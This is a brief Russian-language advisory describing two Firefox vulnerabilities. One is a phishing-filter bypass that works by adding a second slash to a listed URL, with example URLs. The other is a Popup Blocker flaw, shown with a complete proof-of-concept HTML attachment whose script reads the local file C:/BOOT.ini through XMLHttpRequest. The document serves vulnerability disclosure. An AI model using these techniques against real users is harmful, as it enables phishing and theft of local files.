Программа: Mozilla Firefox
Найденные уязвимости позволяют удаленному злоумышленнику осуществить фишинг атаку и получить доступ к конфиденциальной информации на целевой системе.
1) Уязвимость возникает из-за ошибки в механизме защиты от фишинга. Атакующий может добавить символ "/" в конец URL, тем самым, обманув Firefox, выдав злонамеренный сайт за безопасный.
Пример:
Когда URL занесен в список фишинговых сайтов (Phishing List):
http://kaneda.bohater.net/phish.html - будет выведено предупреждение
http://kaneda.bohater.net//phish.html – предупреждения не будет
2) Уязвимость возникает из-за ошибки в проверке входных данных в Firefox Popup Blocker. Атакующий может использовать XMLHttpRequest запрос и использовать URL вида file:///, что позволит ему получить содержимое произвольных файлов на целевой системе.
Пример:
Content-type: text/html
Content-disposition: attachment; filename="foo.html"
<html><body><script>
x = new XMLHttpRequest;
x.open("GET", "file:///c:/BOOT.ini", false);
x.send(null);
alert("The script attempted to read your C:/BOOT.ini:\n\n" + x.responseText);
</script>
